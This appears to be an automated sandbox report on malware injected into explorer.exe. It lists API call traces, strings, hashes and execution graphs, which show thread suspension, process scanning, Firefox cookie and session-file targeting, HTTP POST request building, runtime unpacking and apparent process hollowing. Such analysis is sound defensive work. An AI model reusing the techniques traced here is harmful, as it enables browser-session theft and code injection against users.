                                                                                                                                      • Instruction Fuzzy Hash: 0B312A7A624361BFC725FF20BC4CAA97F6ABB58200F08401CE9054B249CBF9D69DCB51
                                                                                                                                      Function 032216C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 032216D9
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 032216E1
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032216F1
                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 032216FF
                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0322171E
                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 0322172E
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0322173D
                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0322174D
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03221758
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                      • Opcode ID: 08afa3fbfc963ed974e460ae903e105b06fc2a61f5145ef52170afbf0830b411
                                                                                                                                      • Instruction ID: be690fc96a3f3eac93291db286553231d52a2a7006d2649c6325e9dd0800efd0
                                                                                                                                      • Opcode Fuzzy Hash: 08afa3fbfc963ed974e460ae903e105b06fc2a61f5145ef52170afbf0830b411
                                                                                                                                      • Instruction Fuzzy Hash: 2911A032418211FBD325BF61AC4CA6ABFB8EF95B01F048419FA4582144D33096C98BA7
                                                                                                                                      Function 032236A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37sleepstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                        • Part of subcall function 03221363: Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                        • Part of subcall function 03221363: CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,03223834,?,03223C53,00000001), ref: 032236B3
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,03223834,?,03223C53,00000001), ref: 032236CC
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,03223834,?,03223C53,00000001), ref: 032236DC
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 0322150D
                                                                                                                                        • Part of subcall function 032214D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 03221557
                                                                                                                                        • Part of subcall function 032214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
                                                                                                                                        • Part of subcall function 032214D8: DeleteFileW.KERNEL32(00000000), ref: 03221571
                                                                                                                                        • Part of subcall function 032214D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
                                                                                                                                        • Part of subcall function 032214D8: FindClose.KERNEL32(00000000), ref: 0322158F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                                      • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                                      • API String ID: 2731919298-637609321
                                                                                                                                      • Opcode ID: 78aa6dcca780958efb9f3744312da8236144d2d2974b1e9b545dd83348664e62
                                                                                                                                      • Instruction ID: e087323ed354adb035f354cb7e52ba086c224fe8def253e334543640e986efe9
                                                                                                                                      • Opcode Fuzzy Hash: 78aa6dcca780958efb9f3744312da8236144d2d2974b1e9b545dd83348664e62
                                                                                                                                      • Instruction Fuzzy Hash: 69F0A015320270339628B36B6C0CD7F1D5ECBE6F52700411CB60A9A680CE941AC282B9
                                                                                                                                      Function 0322186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                        • Part of subcall function 0322106C: lstrlen.KERNEL32(?,?,00000000,00000000,0322189F,75568A60,?,00000000), ref: 03221074
                                                                                                                                        • Part of subcall function 0322106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 03221086
                                                                                                                                        • Part of subcall function 032217DC: RtlZeroMemory.NTDLL(?,00000018), ref: 032217EE
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 032218FB
                                                                                                                                      • wsprintfW.USER32 ref: 032219F2
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03221AD0
                                                                                                                                      Strings
                                                                                                                                      • Accept: */*Referer: %S, xrefs: 032219E8
                                                                                                                                      • POST, xrefs: 032219A0
                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 03221A34
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                      • Opcode ID: 095d69de1066dc4a75eb62c5f64d2e28718e11f256a06a5879fb4a9261ec45b1
                                                                                                                                      • Instruction ID: e1a9d8e37af913f008a1a3ed3a4d6dfc11d676136bfc72ef4870125e8c3c2b2b
                                                                                                                                      • Opcode Fuzzy Hash: 095d69de1066dc4a75eb62c5f64d2e28718e11f256a06a5879fb4a9261ec45b1
                                                                                                                                      • Instruction Fuzzy Hash: FC818975208311BFD720EF6A9C88E2BBBE9FB88644F04492DF945C7250DB70EA50CB52
                                                                                                                                      Function 032223E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0322104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03222A16,?,00000001), ref: 03221056
                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 032225BB
                                                                                                                                      • lstrcat.KERNEL32(?,032242A8), ref: 032225C7
                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 032225D6
                                                                                                                                      • lstrcat.KERNEL32(?,032242AC), ref: 032225E5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcat$AllocVirtual
                                                                                                                                      • String ID: :authority$?$dyn_header
                                                                                                                                      • API String ID: 3028025275-1785586894
                                                                                                                                      • Opcode ID: 26e2355f025e5d94b3a46547df72bc363dda7881bab02ec9514598051bdd64e9
                                                                                                                                      • Instruction ID: 8fe087cddc882dc56cb85d152b33dd464245e87a275a756d9b01c57d3ccc2478
                                                                                                                                      • Opcode Fuzzy Hash: 26e2355f025e5d94b3a46547df72bc363dda7881bab02ec9514598051bdd64e9
                                                                                                                                      • Instruction Fuzzy Hash: 50616C72528333EFC754EE21DD8067ABFD5AB94210F040D1DE8815B282CBBA998DC762
                                                                                                                                      Function 03221363 Relevance: 7.5, APIs: 5, Instructions: 39processstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 032213A3
                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 032213C0
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 868014591-0
                                                                                                                                      • Opcode ID: 957f841718a245a3817fc22bbe14797f4d663c827994ff89b50451b9ade32446
                                                                                                                                      • Instruction ID: adab2f78e2edc990c751dc6f55f6fa938eee1b72f600fab9ad37885f85ef026b
                                                                                                                                      • Opcode Fuzzy Hash: 957f841718a245a3817fc22bbe14797f4d663c827994ff89b50451b9ade32446
                                                                                                                                      • Instruction Fuzzy Hash: 7AF0C831511124BBD734BA26AC0CFDE7BBCEB59721F0001A0F849D2184EB745AE48A94
                                                                                                                                      Function 032228AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0322291B
                                                                                                                                      • lstrcat.KERNEL32(?,032242BC), ref: 0322292A
                                                                                                                                      • lstrlen.KERNEL32(?,75568A60,00000001,?,?,00000000,?,?,03222B26,?,?,?,?,00000001), ref: 0322295C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                                      • String ID: cookie
                                                                                                                                      • API String ID: 2957667536-1295510418
                                                                                                                                      • Opcode ID: d864b41c01231658d1fd7f27f0548662a5d8abba346d165195e3dc8099f63684
                                                                                                                                      • Instruction ID: 6370ad6371f14c7595fd741d8edbc922a7a3d8a2a50110acfa6f6825de6c7e49
                                                                                                                                      • Opcode Fuzzy Hash: d864b41c01231658d1fd7f27f0548662a5d8abba346d165195e3dc8099f63684
                                                                                                                                      • Instruction Fuzzy Hash: 97110D32314326BBC710EE5ADC85BABBED9DB90700F28092DF80197241EBB3E9C54751
                                                                                                                                      Function 032212AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000), ref: 032212BC
                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 032212CE
                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 032212E1
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 032212F7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 331459951-0
                                                                                                                                      • Opcode ID: 430da6f9fefa63fd14265bfa4326e3661f5a846aa2ea7cbdab9747c66164ba46
                                                                                                                                      • Instruction ID: 0d999b48c1a3b2a332668fbecd913a25220c32cac35dcaa71708f9f997db301f
                                                                                                                                      • Opcode Fuzzy Hash: 430da6f9fefa63fd14265bfa4326e3661f5a846aa2ea7cbdab9747c66164ba46
                                                                                                                                      • Instruction Fuzzy Hash: 06F09071816239FF9B24EFA1AD48CEEBB6CEB01251F14936AF801D2140DB315F819AA1
                                                                                                                                      Function 032232F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlEnterCriticalSection.NTDLL(03226038), ref: 03223332
                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(03226038), ref: 03223358
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                      • String ID: POST
                                                                                                                                      • API String ID: 3168844106-1814004025
                                                                                                                                      • Opcode ID: a2939d15fa6959ee66b77e96300b2b0b2d73b59d15e8df785dc1ffa97d57c028
                                                                                                                                      • Instruction ID: f67b3966c922d5fbf24f4cc7a85c7ededb2646a4728afcfbb0f266f7eca8266b
                                                                                                                                      • Opcode Fuzzy Hash: a2939d15fa6959ee66b77e96300b2b0b2d73b59d15e8df785dc1ffa97d57c028
                                                                                                                                      • Instruction Fuzzy Hash: 3201A23A520224FBCB31AF11EC4CC5E7F29FF8566171C4410F60986125CF79CAD096E0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:6.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:20
                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                      execution_graph 1667 d9d748 1669 d9d74d 1667->1669 1668 d9d835 LoadLibraryA 1668->1669 1669->1668 1672 d9d884 VirtualProtect VirtualProtect 1669->1672 1673 d9d879 1669->1673 1671 d9d912 1671->1671 1672->1671 1674 d9d5da 1675 d9d614 1674->1675 1676 d9d91d 1675->1676 1679 d9d748 1675->1679 1681 d9d74d 1679->1681 1680 d9d835 LoadLibraryA 1680->1681 1681->1680 1684 d9d884 VirtualProtect VirtualProtect 1681->1684 1685 d9d6f8 1681->1685 1683 d9d912 1683->1683 1684->1683 1686 d9d637 1687 d9d62e 1686->1687 1688 d9d91d 1687->1688 1689 d9d748 3 API calls 1687->1689 1690 d9d6f8 1689->1690

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00D95300 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 105 d95300-d95310 call d91be8 108 d95390-d95395 105->108 109 d95312-d95345 call d91838 105->109 113 d95371-d9538a NtUnmapViewOfSection 109->113 114 d95347 call d91838 109->114 116 d9539c-d953ab call d95104 113->116 117 d9538c-d9538e 113->117 120 d9534c-d95365 114->120 124 d953ad-d953b0 call d95300 116->124 125 d953b5-d953be 116->125 117->108 118 d95396-d9539b call d94c80 117->118 118->116 120->113 124->125
                                                                                                                                      APIs
                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 00D95378
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                      • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                      • Instruction ID: 0202f37d1a21ba4fe78f81e2dacbdecfb4c7612e4d37c09a32eab487db758b99
                                                                                                                                      • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                      • Instruction Fuzzy Hash: 10112534601D094FEF5EFBB8A4993793395FB15302F58013AE41AC72A6DE39CA818330
                                                                                                                                      Function 00D95104 Relevance: 9.2, APIs: 6, Instructions: 168processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00D91B74: OpenFileMappingA.KERNEL32 ref: 00D91B8B
                                                                                                                                        • Part of subcall function 00D91B74: MapViewOfFile.KERNELBASE ref: 00D91BAA
                                                                                                                                      • SysFreeMap.PGOCR ref: 00D951A9
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D951B3
                                                                                                                                      • Process32First.KERNEL32 ref: 00D951D6
                                                                                                                                      • Process32Next.KERNEL32 ref: 00D952D9
                                                                                                                                      • CloseHandle.KERNELBASE ref: 00D952EA
                                                                                                                                      • SleepEx.KERNELBASE ref: 00D952F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2838107584-0
                                                                                                                                      • Opcode ID: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                                                                                                      • Instruction ID: a2278c2b6b6f65b8576a0712359180e3708f9389c6de9b1a863b6eb0a6565c46
                                                                                                                                      • Opcode Fuzzy Hash: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                                                                                                      • Instruction Fuzzy Hash: 5A517730204E098FEF5AEF68E899AA973E1FB94301F444729E44BC71A5DF78D905C7A1
                                                                                                                                      Function 00D9D748 Relevance: 4.7, APIs: 3, Instructions: 246memorylibraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 49 d9d748-d9d74b 50 d9d755-d9d759 49->50 51 d9d75b-d9d763 50->51 52 d9d765 50->52 51->52 53 d9d74d-d9d753 52->53 54 d9d767 52->54 53->50 55 d9d76a-d9d771 54->55 57 d9d77d 55->57 58 d9d773-d9d77b 55->58 57->55 59 d9d77f-d9d782 57->59 58->57 60 d9d784-d9d792 59->60 61 d9d797-d9d7a4 59->61 62 d9d7ce-d9d7e9 60->62 63 d9d794-d9d795 60->63 75 d9d7be-d9d7cc call d9d70a 61->75 76 d9d7a6-d9d7a8 61->76 64 d9d81a-d9d81d 62->64 63->61 66 d9d81f-d9d820 64->66 67 d9d822-d9d829 64->67 68 d9d801-d9d805 66->68 69 d9d82f-d9d833 67->69 73 d9d7eb-d9d7ee 68->73 74 d9d807-d9d80a 68->74 71 d9d835-d9d84e LoadLibraryA 69->71 72 d9d884-d9d88d 69->72 78 d9d84f-d9d856 71->78 80 d9d890-d9d899 72->80 73->67 79 d9d7f0 73->79 74->67 81 d9d80c-d9d810 74->81 75->50 82 d9d7ab-d9d7b2 76->82 78->69 86 d9d858-d9d86e 78->86 83 d9d7f1-d9d7f5 79->83 87 d9d89b-d9d89d 80->87 88 d9d8be-d9d90e VirtualProtect * 2 80->88 81->83 84 d9d812-d9d819 81->84 94 d9d7bc 82->94 95 d9d7b4-d9d7ba 82->95 83->68 91 d9d7f7-d9d7f9 83->91 84->64 100 d9d879-d9d883 86->100 101 d9d870-d9d877 86->101 92 d9d89f-d9d8ae 87->92 93 d9d8b0-d9d8bc 87->93 90 d9d912-d9d917 88->90 90->90 96 d9d919-d9d928 90->96 91->68 98 d9d7fb-d9d7ff 91->98 92->80 93->92 94->75 94->82 95->94 98->68 98->74 101->78
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 00D9D847
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00D9D8E5
                                                                                                                                      • VirtualProtect.KERNELBASE ref: 00D9D903
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D9C000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D9C000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d9c000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                      • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                      • Instruction ID: 97ec423f4080a91f5edac6383836aba4370f5149e8e0ff6267192e0c183d4e60
                                                                                                                                      • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                      • Instruction Fuzzy Hash: 6951583265891D4BCF24AA7C9CC43F5B7D2FB59325B58063AC4DAC3286EA58D846C3A1
                                                                                                                                      Function 00D91B74 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 102 d91b74-d91b94 OpenFileMappingA 103 d91bb7-d91bc4 102->103 104 d91b96-d91bb4 MapViewOfFile 102->104 104->103
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                      • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                      • Instruction ID: 34260680a0de21a2122676161a6a1a52380837dcd61023cfceb71d7bc175a71e
                                                                                                                                      • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                      • Instruction Fuzzy Hash: 5FF08235314F094FAB44EF7C9C8C136B7E1EBA8202B04867E984AC7164EF34C8808711
                                                                                                                                      Function 00D93F20 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 127 d93f20-d93f41 StrStrIA 128 d93f43-d93f4f call d93e4c 127->128 129 d93f52-d93f5e 127->129 128->129
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ff82d68b917e3fc31d0b9a1cb0f2d3a54b363e9994e49f468131ccfdc4c4d25c
                                                                                                                                      • Instruction ID: 289dd54117b555261d1004c836f1f85964f2fa47907cdb0a344ebe705251a5e0
                                                                                                                                      • Opcode Fuzzy Hash: ff82d68b917e3fc31d0b9a1cb0f2d3a54b363e9994e49f468131ccfdc4c4d25c
                                                                                                                                      • Instruction Fuzzy Hash: C6E04F30708B095B9B48EFA9A8D853732E1DBAC311B54423DB419C7154DA78CA458761

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:306
                                                                                                                                      Total number of Limit Nodes:42
                                                                                                                                      execution_graph 708 3001000 709 3001010 708->709 710 3001007 708->710 712 3001016 710->712 762 3002608 VirtualQuery 712->762 715 3001097 715->709 717 300102c RtlMoveMemory 718 3001071 GetCurrentProcessId 717->718 719 300104d 717->719 723 3001092 718->723 724 300109e 718->724 799 3002861 GetProcessHeap RtlAllocateHeap 719->799 721 3001052 RtlMoveMemory 721->718 723->715 725 3001095 723->725 765 30010a4 724->765 800 3001332 725->800 727 30010a3 729 3002861 GetProcessHeap RtlAllocateHeap 727->729 730 30010cc 729->730 731 30010dc CreateToolhelp32Snapshot 730->731 732 30010f0 Process32First 731->732 733 3001322 Sleep 731->733 734 300131b CloseHandle 732->734 735 300110c lstrcmpiA 732->735 733->731 734->733 736 3001124 lstrcmpiA 735->736 759 3001280 735->759 737 3001138 lstrcmpiA 736->737 736->759 739 300114c lstrcmpiA 737->739 737->759 738 30025ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->759 740 3001160 lstrcmpiA 739->740 739->759 742 3001170 lstrcmpiA 740->742 740->759 741 3001305 Process32Next 741->735 743 3001319 741->743 744 3001184 lstrcmpiA 742->744 742->759 743->734 745 3001198 lstrcmpiA 744->745 744->759 746 30011ac lstrcmpiA 745->746 745->759 747 30011c0 lstrcmpiA 746->747 746->759 748 30011d4 lstrcmpiA 747->748 747->759 750 30011e8 lstrcmpiA 748->750 748->759 749 3002608 VirtualQuery 749->759 751 30011fc lstrcmpiA 750->751 750->759 752 300120c lstrcmpiA 751->752 751->759 754 300121c lstrcmpiA 752->754 752->759 753 30012ae lstrcmpiA 753->759 755 300122c lstrcmpiA 754->755 754->759 756 300123c lstrcmpiA 755->756 755->759 758 300124c lstrcmpiA 756->758 756->759 757 3001819 30 API calls 757->759 758->759 760 300125c lstrcmpiA 758->760 759->738 759->741 759->749 759->753 759->757 760->759 761 300126c lstrcmpiA 760->761 761->741 761->759 763 300101e 762->763 763->715 764 3002861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 3002861 GetProcessHeap RtlAllocateHeap 765->827 767 30010cc 768 30010dc CreateToolhelp32Snapshot 767->768 769 30010f0 Process32First 768->769 770 3001322 Sleep 768->770 771 300131b CloseHandle 769->771 772 300110c lstrcmpiA 769->772 770->768 771->770 773 3001124 lstrcmpiA 772->773 779 3001280 772->779 774 3001138 lstrcmpiA 773->774 773->779 776 300114c lstrcmpiA 774->776 774->779 777 3001160 lstrcmpiA 776->777 776->779 777->779 780 3001170 lstrcmpiA 777->780 778 3001305 Process32Next 778->772 781 3001319 778->781 779->778 787 3002608 VirtualQuery 779->787 791 30012ae lstrcmpiA 779->791 828 30025ad OpenProcess 779->828 834 3001819 779->834 780->779 782 3001184 lstrcmpiA 780->782 781->771 782->779 783 3001198 lstrcmpiA 782->783 783->779 784 30011ac lstrcmpiA 783->784 784->779 785 30011c0 lstrcmpiA 784->785 785->779 786 30011d4 lstrcmpiA 785->786 786->779 788 30011e8 lstrcmpiA 786->788 787->779 788->779 789 30011fc lstrcmpiA 788->789 789->779 790 300120c lstrcmpiA 789->790 790->779 792 300121c lstrcmpiA 790->792 791->779 792->779 793 300122c lstrcmpiA 792->793 793->779 794 300123c lstrcmpiA 793->794 794->779 796 300124c lstrcmpiA 794->796 796->779 797 300125c lstrcmpiA 796->797 797->779 798 300126c lstrcmpiA 797->798 798->778 798->779 799->721 880 3002861 GetProcessHeap RtlAllocateHeap 800->880 802 3001340 GetModuleFileNameA 881 3002861 GetProcessHeap RtlAllocateHeap 802->881 804 3001357 GetCurrentProcessId wsprintfA 882 300263e 